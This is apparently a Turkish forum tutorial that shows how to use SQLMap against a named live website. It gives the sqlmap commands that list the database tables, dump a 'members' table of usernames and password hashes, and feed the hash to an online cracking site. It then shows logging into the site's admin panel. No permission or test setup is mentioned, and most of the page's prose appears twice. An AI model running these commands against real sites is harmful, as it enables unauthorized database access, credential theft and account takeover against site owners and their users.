- 24 Mar 2022
- 84
- 39
SQLMap
SQLMap, SQL enjeksiyon açıklarını tespit etmek ve bu açıklardan yararlanarak veritabanına erişim sağlamak için kullanılan bir araçtır. Şimdi gelin nasıl kullanıldığına bir göz atalım.
Hedef sitemiz -> How to link to our articles
SQLMap Kurulumu
Kullanımına geçmeden önce SQLMap kurulumunu kısaca gösterelim.
SQLMap Kullanımı
Tarama sonrasında elimize tablolar düştü burada dikkat çeken bir tablo var members tablosu, şimdi bu tablo içerisindeki kolonlara bakalım.
Şimdi kolonların içerisindeki verileri görmek için
Elimize hash'li bir şifre ve kullanıcı adı geçti şimdi hash kırmaya çalışalım.
Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online sitesini kullanarak şans eseri hash'İ kırmayı başardım.
Hedef url'nin sonuna admin yazıyorum ve şans eseri admin panelini buluyorum geriye şifre ve kullanıcı adını kullanarak giriş yapmak kaldı.
Ve içerdeyim
Benim anlatıcaklarım bu kadardı umarım faydalı bir konu olmuştur. Bu arada sqlmap biraz şans işi her seferinde işe yaramıyor biraz şansınızın olması gerekiyor.
SQLMap, SQL enjeksiyon açıklarını tespit etmek ve bu açıklardan yararlanarak veritabanına erişim sağlamak için kullanılan bir araçtır. Şimdi gelin nasıl kullanıldığına bir göz atalım.
Hedef sitemiz -> How to link to our articles
SQLMap Kurulumu
Kullanımına geçmeden önce SQLMap kurulumunu kısaca gösterelim.
Kod:
sudo apt-get install sqlmap
SQLMap Kullanımı
sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --tables --answers="*"
-u
parametresi url ifade ediyor -u
parametresinden sonra taranmasını istediğimiz url giriyoruz. --tables
tarama eğer başarılı olursa elde ettiği database içerisindeki tabloları yazdırmasını istiyoruz.--answers="*"
bütün sorulara yes yanıtını veriyoruz.Tarama sonrasında elimize tablolar düştü burada dikkat çeken bir tablo var members tablosu, şimdi bu tablo içerisindeki kolonlara bakalım.
sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --columns -T members
--columns
parametresini tablo içerisindeki kolonları görmek için kullanıyoruz.-T
parametresi tablo anlamına geliyor yanına kolonlarını görmek istediğimiz tabloyu yazıyoruz.Şimdi kolonların içerisindeki verileri görmek için
--columns
yerine --dump
parametresini kullanıyoruz.sqlmap -u "http://www.thepurrcompany.com/cat-articles/linking-info.php?id=7" --dump -T members
Elimize hash'li bir şifre ve kullanıcı adı geçti şimdi hash kırmaya çalışalım.
Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online sitesini kullanarak şans eseri hash'İ kırmayı başardım.
Hedef url'nin sonuna admin yazıyorum ve şans eseri admin panelini buluyorum geriye şifre ve kullanıcı adını kullanarak giriş yapmak kaldı.
Ve içerdeyim
Benim anlatıcaklarım bu kadardı umarım faydalı bir konu olmuştur. Bu arada sqlmap biraz şans işi her seferinde işe yaramıyor biraz şansınızın olması gerekiyor.